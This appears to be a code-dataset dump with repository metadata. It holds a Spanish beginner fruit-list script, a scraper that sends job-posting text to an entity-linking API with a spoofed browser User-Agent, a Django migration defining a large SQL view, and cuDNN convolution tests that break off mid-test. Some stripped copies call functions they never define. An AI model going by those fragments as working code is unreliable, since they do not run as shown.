if("Bananas" in Frutas_favoritas):
print("Las bananas saben muy ricas") | 27.8125 | 53 | 0.71236 | Frutas_favoritas = ["Mangos", "Manzanas", "Bananas"]
# Membership checks against the Frutas_favoritas list defined above;
# each prints only when that fruit is in the favourites.
if("Mangos" in Frutas_favoritas):
    print("La neta si me gustan mucho los Manguitos")
if("Cocos" in Frutas_favoritas):
    print("En verdad me agradan los cocos")
if("Manzanas" in Frutas_favoritas):
    print("Me gustan mucho las manzanas")
if("Kiwis" in Frutas_favoritas):
    print("Comer kiwis esta chido")
if("Bananas" in Frutas_favoritas):
    print("Las bananas saben muy ricas")
98bebd6603bbed75923ed756d9394c967e7166a2 | 2,430 | py | Python | scrapy/get_enti_and_know.py | LouisYZK/recruitKG | 2f65f005230ea0ca05eb45d9e1e689f83dec2720 | [
"MIT"
] | null | null | null | scrapy/get_enti_and_know.py | LouisYZK/recruitKG | 2f65f005230ea0ca05eb45d9e1e689f83dec2720 | [
"MIT"
] | null | null | null | scrapy/get_enti_and_know.py | LouisYZK/recruitKG | 2f65f005230ea0ca05eb45d9e1e689f83dec2720 | [
"MIT"
] | null | null | null | import sqlite3
import requests
import json
import time
"""
Input: doc from zhilian_doc.db
Aim:
get the entities/knowledges in the doc.
store them into entites.json/knowledges.json
entities.json:
{
'name+position':List(entities),
}
konwledges.json:
{
'entity':[
['relation', 'entity'],
...
],
}
"""
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'
}
conn = sqlite3.connect('zhilian_doc.db')
cur = conn.cursor()
data = cur.execute('select * from zhilian_doc')
seen_entity = set()
name, pos, doc = next(data)
entities = get_entity(doc)
while True:
name, pos, doc = next(data)
time.sleep(3)
entities = get_entity(doc)
entities = list(flatten(entities))
# knows = get_triple_tuple(entities)
print(entities)
# en_store_to_json(name, pos, entities)
# konw_store_to_json(name, pos, knows)
| 25.851064 | 139 | 0.617695 | import sqlite3
import requests
import json
import time
"""
Input: doc from zhilian_doc.db
Aim:
get the entities/knowledges in the doc.
store them into entites.json/knowledges.json
entities.json:
{
'name+position':List(entities),
}
konwledges.json:
{
'entity':[
['relation', 'entity'],
...
],
}
"""
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'
}
def flatten(items):
    """Yield every atomic element of *items*, descending into nested iterables.

    Strings and bytes are treated as atoms rather than being iterated
    character by character. Elements are produced depth-first, preserving
    the original left-to-right order.
    """
    for element in items:
        treat_as_atom = (isinstance(element, (str, bytes))
                         or not hasattr(element, '__iter__'))
        if treat_as_atom:
            yield element
        else:
            yield from flatten(element)
def get_entity(doc):
    """Segment *doc* with the shuyantech entity-linking API.

    The document is split into sentences on the Chinese full stop and one
    HTTP request is issued per sentence. Returns a list with one entry per
    sentence, each entry being the list of linked entity names for that
    sentence.
    """
    url = 'http://shuyantech.com/api/entitylinking/cutsegment'
    # Split on the Chinese full stop; each fragment is queried separately.
    doc = doc.split('。')
    entities = []
    for item in doc:
        params = {'q':item}
        r = requests.get(url, params=params, headers=headers)
        # Each element of 'entities' is indexed at [1] below — presumably a
        # [mention, entity_name] pair; confirm against the API docs.
        entity = json.loads(r.text)['entities']
        entities.append([item2[1] for item2 in entity])
    return entities
def get_triple_tuple(entities):
    """Fetch knowledge for each not-yet-seen entity from the CN-DBpedia API.

    Mutates the module-level ``seen_entity`` set, so across calls every
    entity is queried at most once. Returns a dict mapping entity name to
    the API's ``ret`` payload (per the module docstring, a list of
    [relation, entity] pairs).
    """
    url = 'http://shuyantech.com/api/cndbpedia/avpair'
    know = {}
    for item in entities:
        if item not in seen_entity:
            # Record the entity before the request so it is never re-queried.
            seen_entity.add(item)
            params = {'q':item}
            text = requests.get(url, params=params, headers=headers).text
            knowledge = json.loads(text)['ret']
            know[item] = knowledge
    return know
def en_store_to_json(name, pos, entities):
    """Append one ``{name+pos: entities}`` JSON object to ./entities.json.

    NOTE(review): the file is opened in append mode, so successive calls
    produce several concatenated JSON objects in one file, which a plain
    ``json.load`` cannot parse back — confirm whether a JSON-lines format
    (one object per line) was intended.
    """
    en = {}
    with open('./entities.json', 'a') as fp:
        # Key is the concatenation of the company name and position title.
        en[name + pos] = entities
        json.dump(en, fp)
def konw_store_to_json(name, pos, knows):
    """Append the *knows* dict to ./knows.json.

    NOTE(review): ``name`` and ``pos`` are accepted but never used, and the
    append mode produces concatenated JSON objects (same caveat as
    en_store_to_json) — confirm the intended file format.
    """
    with open('./knows.json', 'a') as fp:
        json.dump(knows, fp)
def get_proxy():
    """Fetch a proxy address from the local proxy-pool service."""
    response = requests.get("http://127.0.0.1:5010/get/")
    return response.content
def delete_proxy(proxy):
    """Ask the local proxy-pool service to discard *proxy*."""
    url = "http://127.0.0.1:5010/delete/?proxy={}".format(proxy)
    requests.get(url)
# --- Driver: stream job postings from SQLite and extract their entities ---
conn = sqlite3.connect('zhilian_doc.db')
cur = conn.cursor()
data = cur.execute('select * from zhilian_doc')
# Shared across get_triple_tuple calls so each entity is queried only once.
seen_entity = set()
# Iterate the cursor directly: a for-loop terminates cleanly at the end of
# the result set, whereas the original ``while True: next(data)`` raised
# StopIteration on exhaustion and also discarded the first row's entities.
for name, pos, doc in data:
    time.sleep(3)  # throttle requests to the public API
    entities = list(flatten(get_entity(doc)))
    # knows = get_triple_tuple(entities)
    print(entities)
    # en_store_to_json(name, pos, entities)
    # konw_store_to_json(name, pos, knows)
| 1,310 | 0 | 161 |
438643e5aacef760fca7aa171a129595bcaf3cd1 | 26,276 | py | Python | cit-api/pipeline/migrations/0149_auto_20210416_1946.py | bcgov/CIT | b9db4f169b52e9a6293b3ee1e61935888074215a | [
"Apache-2.0"
] | 10 | 2020-11-12T15:13:40.000Z | 2022-03-05T22:33:08.000Z | cit-api/pipeline/migrations/0149_auto_20210416_1946.py | bcgov/CIT | b9db4f169b52e9a6293b3ee1e61935888074215a | [
"Apache-2.0"
] | 28 | 2020-07-17T16:33:55.000Z | 2022-03-21T16:24:25.000Z | cit-api/pipeline/migrations/0149_auto_20210416_1946.py | bcgov/CIT | b9db4f169b52e9a6293b3ee1e61935888074215a | [
"Apache-2.0"
] | 5 | 2020-11-02T23:39:53.000Z | 2022-03-01T19:09:45.000Z | # Generated by Django 2.2.16 on 2021-04-16 19:46
from django.db import migrations
| 61.106977 | 169 | 0.590463 | # Generated by Django 2.2.16 on 2021-04-16 19:46
from django.db import migrations
def change_status(apps, schema_editor):
    """Forward data migration: set the CLOS approval status's display name."""
    # Use the historical model, as required inside RunPython operations.
    ApprovalStatus = apps.get_model("pipeline", "ApprovalStatus")
    status = ApprovalStatus.objects.get(status_code="CLOS")
    status.status_name = "Closed"
    status.save()
def undo_change_status(apps, schema_editor):
    """Reverse data migration for change_status.

    NOTE(review): this writes the same value ("Closed") as the forward
    migration, so reversing is a no-op rather than a restore of the previous
    status name — confirm the pre-0149 value and use it here if a true
    rollback is wanted.
    """
    ApprovalStatus = apps.get_model("pipeline", "ApprovalStatus")
    status = ApprovalStatus.objects.get(status_code="CLOS")
    status.status_name = "Closed"
    status.save()
class Migration(migrations.Migration):
dependencies = [
('pipeline', '0148_indianreservebandname_band_name'),
]
operations = [
migrations.RunPython(change_status, undo_change_status),
migrations.RunSQL("""DROP VIEW IF EXISTS public.cit_opportunities_vw;
CREATE OR REPLACE VIEW public.cit_opportunities_vw
AS
SELECT o.id AS opportunity_id,
o.opportunity_address,
st_y(o.geo_position) AS latitude,
st_x(o.geo_position) AS longitude,
o.date_created,
o.date_updated,
( SELECT a.status_name AS approval_status_name
FROM pipeline_approvalstatus a
WHERE a.status_code::text = o.approval_status_id::text) AS approval_status_name,
( SELECT a.status_description AS approval_status_description
FROM pipeline_approvalstatus a
WHERE a.status_code::text = o.approval_status_id::text) AS approval_status_description,
( SELECT a.active_status AS approval_status_active_ind
FROM pipeline_approvalstatus a
WHERE a.status_code::text = o.approval_status_id::text) AS approval_status_active_ind,
o.business_contact_email,
o.business_contact_name,
o.community_link AS community_url,
o.elevation_at_location AS location_elevation,
o.environmental_information,
o.opportunity_description,
o.opportunity_electrical_capacity,
o.opportunity_electrical_connected AS opportunity_electrical_connected_ind,
o.opportunity_link AS opportunity_url,
o.opportunity_name,
o.opportunity_natural_gas_capacity,
o.opportunity_natural_gas_connected AS opportunity_natural_gas_connected_ind,
o.opportunity_road_connected AS opportunity_road_connected_ind,
o.opportunity_sewer_capacity,
o.opportunity_sewer_connected AS opportunity_sewer_connected_ind,
o.opportunity_water_capacity,
o.opportunity_water_connected AS opportunity_water_connected_ind,
o.parcel_ownership,
o.parcel_size AS parcel_size_acres,
o.pid,
o.soil_drainage,
o.soil_name,
o.soil_texture,
o.last_admin,
o.public_note,
o.date_published,
( SELECT l.name
FROM pipeline_landusezoning l
WHERE l.code::text = o.land_use_zoning::text) AS land_use_zoning_name,
( SELECT l.description
FROM pipeline_landusezoning l
WHERE l.code::text = o.land_use_zoning::text) AS land_use_zoning_desc,
( SELECT l.name
FROM pipeline_landusezoning l
WHERE l.code::text = o.ocp_zoning_code::text) AS ocp_zoning_name,
( SELECT l.description
FROM pipeline_landusezoning l
WHERE l.code::text = o.ocp_zoning_code::text) AS ocp_zoning_desc,
( SELECT p.name
FROM pipeline_propertystatus p
WHERE p.code::text = o.opportunity_property_status::text) AS opportunity_property_status_name,
( SELECT p.description
FROM pipeline_propertystatus p
WHERE p.code::text = o.opportunity_property_status::text) AS opportunity_property_status_desc,
o.nearest_transmission_line AS nearest_transmission_line_distance,
( SELECT l.name
FROM pipeline_airportdistance d,
pipeline_airport a,
pipeline_location l
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id AND a.location_ptr_id = l.id) AS nearest_airport,
( SELECT a.description
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_type,
( SELECT a.aerodrome_status
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_aerodrome_status,
( SELECT a.aircraft_access_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_aircraft_access_ind,
( SELECT a.elevation
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_airport_elevation,
( SELECT a.fuel_availability_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_fuel_availability_ind,
( SELECT a.helicopter_access_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_helicopter_access_ind,
( SELECT a.max_runway_length
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_max_runway_length,
( SELECT a.number_of_runways
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_number_of_runways,
( SELECT a.runway_surface
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_runway_surface,
( SELECT a.oil_availability_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_oil_availability_ind,
( SELECT a.seaplane_access_ind
FROM pipeline_airportdistance d,
pipeline_airport a
WHERE d.id = o.nearest_airport AND d.airport_id = a.location_ptr_id) AS nearest_airport_seaplane_access_ind,
( SELECT d.airport_distance
FROM pipeline_airportdistance d
WHERE d.id = o.nearest_airport) AS nearest_airport_distance,
( SELECT l.name
FROM pipeline_firstresponderdistance d,
pipeline_firstresponder f,
pipeline_location l
WHERE d.id = o.nearest_ambulance_station AND d.first_responder_id = f.location_ptr_id AND f.location_ptr_id = l.id) AS nearest_ambulance_station,
( SELECT d.first_responder_distance
FROM pipeline_firstresponderdistance d
WHERE d.id = o.nearest_ambulance_station) AS nearest_ambulance_station_distance,
( SELECT l.name
FROM pipeline_firstresponderdistance d,
pipeline_firstresponder f,
pipeline_location l
WHERE d.id = o.nearest_coast_guard_station AND d.first_responder_id = f.location_ptr_id AND f.location_ptr_id = l.id) AS nearest_coast_guard_station,
( SELECT d.first_responder_distance
FROM pipeline_firstresponderdistance d
WHERE d.id = o.nearest_coast_guard_station) AS nearest_coast_guard_station_distance,
( SELECT l.name
FROM pipeline_customsportofentrydistance d,
pipeline_customsportofentry c,
pipeline_location l
WHERE d.id = o.nearest_customs_port_of_entry AND d.port_id = c.location_ptr_id AND c.location_ptr_id = l.id) AS nearest_customs_port_of_entry,
( SELECT c.customs_port_type
FROM pipeline_customsportofentrydistance d,
pipeline_customsportofentry c
WHERE d.id = o.nearest_customs_port_of_entry AND d.port_id = c.location_ptr_id) AS nearest_customs_port_type,
( SELECT c.customs_port_street_address
FROM pipeline_customsportofentrydistance d,
pipeline_customsportofentry c
WHERE d.id = o.nearest_customs_port_of_entry AND d.port_id = c.location_ptr_id) AS nearest_customs_port_street_address,
( SELECT c.customs_port_municipality
FROM pipeline_customsportofentrydistance d,
pipeline_customsportofentry c
WHERE d.id = o.nearest_customs_port_of_entry AND d.port_id = c.location_ptr_id) AS nearest_customs_port_municipality,
( SELECT d.customs_port_distance
FROM pipeline_customsportofentrydistance d
WHERE d.id = o.nearest_customs_port_of_entry) AS nearest_customs_port_of_entry_distance,
( SELECT l.name
FROM pipeline_firstresponderdistance d,
pipeline_firstresponder f,
pipeline_location l
WHERE d.id = o.nearest_fire_station AND d.first_responder_id = f.location_ptr_id AND f.location_ptr_id = l.id) AS nearest_fire_station,
( SELECT d.first_responder_distance
FROM pipeline_firstresponderdistance d
WHERE d.id = o.nearest_fire_station) AS nearest_fire_station_distance,
( SELECT l.name
FROM pipeline_hospitaldistance d,
pipeline_hospital h,
pipeline_location l
WHERE d.id = o.nearest_health_center AND d.hospital_id = h.location_ptr_id AND h.location_ptr_id = l.id) AS nearest_hospital,
( SELECT h.rg_name
FROM pipeline_hospitaldistance d,
pipeline_hospital h
WHERE d.id = o.nearest_health_center AND d.hospital_id = h.location_ptr_id) AS nearest_hospital_region_name,
( SELECT h.hours
FROM pipeline_hospitaldistance d,
pipeline_hospital h
WHERE d.id = o.nearest_health_center AND d.hospital_id = h.location_ptr_id) AS nearest_hospital_hours,
( SELECT h.sv_description
FROM pipeline_hospitaldistance d,
pipeline_hospital h
WHERE d.id = o.nearest_health_center AND d.hospital_id = h.location_ptr_id) AS nearest_hospital_services,
( SELECT d.hospital_distance
FROM pipeline_hospitaldistance d
WHERE d.id = o.nearest_health_center) AS nearest_hospital_distance,
( SELECT r.name
FROM pipeline_roadsandhighwaysdistance d,
pipeline_roadsandhighways r
WHERE d.id = o.nearest_highway AND d.highway_id = r.id) AS nearest_highway_name,
( SELECT r.road_name_alias1
FROM pipeline_roadsandhighwaysdistance d,
pipeline_roadsandhighways r
WHERE d.id = o.nearest_highway AND d.highway_id = r.id) AS nearest_highway_alias_1,
( SELECT r.road_name_alias2
FROM pipeline_roadsandhighwaysdistance d,
pipeline_roadsandhighways r
WHERE d.id = o.nearest_highway AND d.highway_id = r.id) AS nearest_highway_alias_2,
( SELECT r.number_of_lanes
FROM pipeline_roadsandhighwaysdistance d,
pipeline_roadsandhighways r
WHERE d.id = o.nearest_highway AND d.highway_id = r.id) AS nearest_highway_number_of_lanes,
( SELECT d.highway_distance
FROM pipeline_roadsandhighwaysdistance d
WHERE d.id = o.nearest_highway) AS nearest_highway_distance,
( SELECT l.name
FROM pipeline_lakedistance d,
pipeline_lake l
WHERE d.id = o.nearest_lake AND d.lake_id = l.id) AS nearest_lake,
( SELECT d.lake_distance
FROM pipeline_lakedistance d
WHERE d.id = o.nearest_lake) AS nearest_lake_distance,
( SELECT l.name
FROM pipeline_firstresponderdistance d,
pipeline_firstresponder f,
pipeline_location l
WHERE d.id = o.nearest_police_station AND d.first_responder_id = f.location_ptr_id AND f.location_ptr_id = l.id) AS nearest_police_station,
( SELECT d.first_responder_distance
FROM pipeline_firstresponderdistance d
WHERE d.id = o.nearest_police_station) AS nearest_police_station_distance,
( SELECT l.name
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p,
pipeline_location l
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id AND p.location_ptr_id = l.id) AS nearest_port,
( SELECT p.authority
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id) AS nearest_port_authority,
( SELECT p.description
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id) AS nearest_port_type,
( SELECT p.commodities_handled
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id) AS nearest_port_commodities_handled,
( SELECT p.physical_address
FROM pipeline_portandterminaldistance d,
pipeline_portandterminal p
WHERE d.id = o.nearest_port AND d.port_id = p.location_ptr_id) AS nearest_port_address,
( SELECT d.port_distance
FROM pipeline_portandterminaldistance d
WHERE d.id = o.nearest_port) AS nearest_port_distance,
( SELECT l.name
FROM pipeline_postsecondarydistance d,
pipeline_postsecondaryinstitution p,
pipeline_location l
WHERE d.id = o.nearest_post_secondary AND d.location_id = p.location_ptr_id AND p.location_ptr_id = l.id) AS nearest_post_secondary_name,
( SELECT p.institution_type
FROM pipeline_postsecondarydistance d,
pipeline_postsecondaryinstitution p
WHERE d.id = o.nearest_post_secondary AND d.location_id = p.location_ptr_id) AS nearest_post_secondary_type,
( SELECT d.location_distance
FROM pipeline_postsecondarydistance d
WHERE d.id = o.nearest_post_secondary) AS nearest_post_secondary_distance,
( SELECT r.name
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_name,
( SELECT r.use_type
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_use_type,
( SELECT r.number_of_tracks
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_number_of_tracks,
( SELECT r.electrification
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_electrification,
( SELECT r.status
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_status,
( SELECT r.track_classification
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_track_class,
( SELECT r.operator_english_name
FROM pipeline_railwaydistance d,
pipeline_railway r
WHERE d.id = o.nearest_railway AND d.railway_id = r.id) AS nearest_railway_operator,
( SELECT d.railway_distance
FROM pipeline_railwaydistance d
WHERE d.id = o.nearest_railway) AS nearest_railway_distance,
( SELECT l.name
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r,
pipeline_location l
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id AND r.location_ptr_id = l.id) AS nearest_research_centre,
( SELECT r.research_specialties
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_specialties,
( SELECT r.research_centre_affiliation
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_affiliation,
( SELECT r.inst_acrnm
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_acronym,
( SELECT r.research_sector
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_research_sector,
( SELECT r.cntr_type
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_type,
( SELECT r.institution
FROM pipeline_researchcentredistance d,
pipeline_researchcentre r
WHERE d.id = o.nearest_research_centre AND d.research_centre_id = r.location_ptr_id) AS nearest_research_centre_institution,
( SELECT d.research_centre_distance
FROM pipeline_researchcentredistance d
WHERE d.id = o.nearest_research_centre) AS nearest_research_center_distance,
( SELECT r.name
FROM pipeline_riverdistance d,
pipeline_river r
WHERE d.id = o.nearest_river AND d.river_id = r.id) AS nearest_river,
( SELECT d.river_distance
FROM pipeline_riverdistance d
WHERE d.id = o.nearest_river) AS nearest_river_distance,
o.opportunity_rental_price,
o.opportunity_sale_price,
( SELECT c.place_name
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS community_name,
( SELECT c.community_type
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS community_type,
( SELECT c.band_number
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS band_number,
( SELECT c.fn_community_name
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS first_nation_community_name,
( SELECT c.nation
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS first_nation,
( SELECT c.num_courts
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS num_courts,
( SELECT c.num_hospitals
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS num_hospitals,
( SELECT c.num_schools
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS num_schools,
( SELECT c.num_timber_facilities
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS num_timber_facilities,
( SELECT c.incorporated
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS incorporated_ind,
( SELECT c.has_any_k12_school
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS has_any_k12_school_ind,
( SELECT c.is_coastal
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS is_coastal_ind,
( SELECT c.nearest_substation_distance
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS nearest_substation_distance,
( SELECT c.nearest_substation_name
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS nearest_substation_name,
( SELECT c.nearest_transmission_distance
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS nearest_transmission_distance,
( SELECT c.transmission_line_description
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS transmission_line_description,
( SELECT c.transmission_line_voltage
FROM pipeline_communitydistance d,
pipeline_community c
WHERE d.id = o.nearest_community AND d.community_id = c.id) AS transmission_line_voltage,
( SELECT d.community_distance
FROM pipeline_communitydistance d
WHERE d.id = o.nearest_community) AS nearest_community_distance,
( SELECT m.name
FROM pipeline_municipality m
WHERE m.id = o.municipality_id) AS municipality,
( SELECT r.name
FROM pipeline_regionaldistrict r
WHERE r.id = o.regional_district_id) AS regional_district,
o.network_at_road,
o.network_avg
FROM pipeline_opportunity o;
""")
]
| 397 | 25,725 | 69 |
a3fc35eb5e2380fc537e6fcf21e7f38540d03f6c | 6,045 | py | Python | pylearn2/linear/tests/test_cudnn.py | ikervazquezlopez/Pylearn2 | 2971e8f64374ffde572d4cf967aad5342beaf5e0 | [
"BSD-3-Clause"
] | 2,045 | 2015-01-01T14:07:52.000Z | 2022-03-08T08:56:41.000Z | pylearn2/linear/tests/test_cudnn.py | ikervazquezlopez/Pylearn2 | 2971e8f64374ffde572d4cf967aad5342beaf5e0 | [
"BSD-3-Clause"
] | 305 | 2015-01-02T13:18:24.000Z | 2021-08-20T18:03:28.000Z | pylearn2/linear/tests/test_cudnn.py | ikervazquezlopez/Pylearn2 | 2971e8f64374ffde572d4cf967aad5342beaf5e0 | [
"BSD-3-Clause"
] | 976 | 2015-01-01T17:08:51.000Z | 2022-03-25T19:53:17.000Z | """
Tests for the Cudnn code.
"""
__author__ = "Francesco Visin"
__license__ = "3-clause BSD"
__credits__ = "Francesco Visin"
__maintainer__ = "Lisa Lab"
import theano
from theano import tensor
from theano.sandbox.cuda.dnn import dnn_available
from pylearn2.linear.conv2d import Conv2D
from pylearn2.linear.cudnn2d import Cudnn2D, make_random_conv2D
from pylearn2.space import Conv2DSpace
from pylearn2.utils import sharedX
from pylearn2.testing.skip import skip_if_no_gpu
import unittest
from nose.plugins.skip import SkipTest
import numpy as np
class TestCudnn(unittest.TestCase):
    """
    Tests for the Cudnn code.
    Parameters
    ----------
    Refer to unittest.TestCase.
    """
    def setUp(self):
        """
        Set up a test image and filter to re-use.
        """
        # Either guard may skip the whole class: no GPU, or no cuDNN support.
        skip_if_no_gpu()
        if not dnn_available():
            raise SkipTest('Skipping tests cause cudnn is not available')
        # cuDNN only supports float32; force it here and restore in tearDown.
        self.orig_floatX = theano.config.floatX
        theano.config.floatX = 'float32'
        # One 3x3 single-channel image in ('b', 'c', 0, 1) layout.
        self.image = np.random.rand(1, 1, 3, 3).astype(theano.config.floatX)
        self.image_tensor = tensor.tensor4()
        self.input_space = Conv2DSpace((3, 3), 1, axes=('b', 'c', 0, 1))
        # A single 2x2 all-ones filter, shared by most tests below.
        self.filters_values = np.ones(
            (1, 1, 2, 2), dtype=theano.config.floatX
        )
        self.filters = sharedX(self.filters_values, name='filters')
        self.batch_size = 1
        self.cudnn2d = Cudnn2D(self.filters, self.batch_size, self.input_space)
    def tearDown(self):
        """
        After test clean up.
        """
        # Restore whatever floatX was active before setUp forced float32.
        theano.config.floatX = self.orig_floatX
    def test_value_errors(self):
        """
        Check correct errors are raised when bad input is given.
        """
        # A negative batch size must be rejected by Cudnn2D's assertions.
        with self.assertRaises(AssertionError):
            Cudnn2D(filters=self.filters, batch_size=-1,
                    input_space=self.input_space)
    def test_get_params(self):
        """
        Check whether the cudnn has stored the correct filters.
        """
        self.assertEqual(self.cudnn2d.get_params(), [self.filters])
    def test_get_weights_topo(self):
        """
        Check whether the cudnn has stored the correct filters.
        """
        # Topological weights are compared against the ('b', 'c', 0, 1)
        # filters transposed to ('b', 0, 1, 'c').
        self.assertTrue(np.all(
            self.cudnn2d.get_weights_topo(borrow=True) ==
            np.transpose(self.filters.get_value(borrow=True), (0, 2, 3, 1))))
    def test_lmul(self):
        """
        Use conv2D to check whether the convolution worked correctly.
        """
        # The plain Conv2D implementation serves as the reference output.
        conv2d = Conv2D(self.filters, self.batch_size, self.input_space,
                        output_axes=('b', 'c', 0, 1),)
        f_co = theano.function([self.image_tensor],
                               conv2d.lmul(self.image_tensor))
        f_cu = theano.function([self.image_tensor],
                               self.cudnn2d.lmul(self.image_tensor))
        self.assertTrue(np.allclose(f_co(self.image), f_cu(self.image)))
    def test_set_batch_size(self):
        """
        Make sure that setting the batch size actually changes the property.
        """
        img_shape = self.cudnn2d._img_shape
        self.cudnn2d.set_batch_size(self.batch_size + 10)
        # Only the leading (batch) entry of the image shape should change.
        np.testing.assert_equal(self.cudnn2d._img_shape[0],
                                self.batch_size + 10)
        np.testing.assert_equal(self.cudnn2d._img_shape[1:], img_shape[1:])
    def test_axes(self):
        """
        Test different output axes.
        Use different output axes and see whether the output is what we
        expect.
        """
        default_axes = ('b', 'c', 0, 1)
        axes = (0, 'b', 1, 'c')
        another_axes = (0, 1, 'c', 'b')
        # 1, 3, 0, 2
        map_to_default = tuple(axes.index(axis) for axis in default_axes)
        # 2, 0, 3, 1
        map_to_another_axes = tuple(default_axes.index(axis) for
                                    axis in another_axes)
        input_space = Conv2DSpace((3, 3), num_channels=1, axes=another_axes)
        # Apply cudnn2d with `axes` as output_axes
        cudnn2d = Cudnn2D(self.filters, 1, input_space, output_axes=axes)
        f = theano.function([self.image_tensor],
                            cudnn2d.lmul(self.image_tensor))
        # Apply cudnn2d with default axes
        f_def = theano.function([self.image_tensor],
                                self.cudnn2d.lmul(self.image_tensor))
        # Apply f on the `another_axes`-shaped image
        output = f(np.transpose(self.image, map_to_another_axes))
        # Apply f_def on self.image (b,c,0,1)
        output_def = np.array(f_def(self.image))
        # transpose output to def
        output = np.transpose(output, map_to_default)
        np.testing.assert_allclose(output_def, output)
        np.testing.assert_equal(output_def.shape, output.shape)
    def test_channels(self):
        """
        Go from 2 to 3 channels and see whether the shape is correct.
        """
        input_space = Conv2DSpace((3, 3), num_channels=3)
        # Two output channels, three input channels, 2x2 kernels.
        filters_values = np.ones(
            (2, 3, 2, 2), dtype=theano.config.floatX
        )
        filters = sharedX(filters_values)
        image = np.random.rand(1, 3, 3, 3).astype(theano.config.floatX)
        cudnn2d = Cudnn2D(filters, 1, input_space)
        f = theano.function([self.image_tensor],
                            cudnn2d.lmul(self.image_tensor))
        # 3x3 input convolved with 2x2 kernels -> 2x2 spatial output.
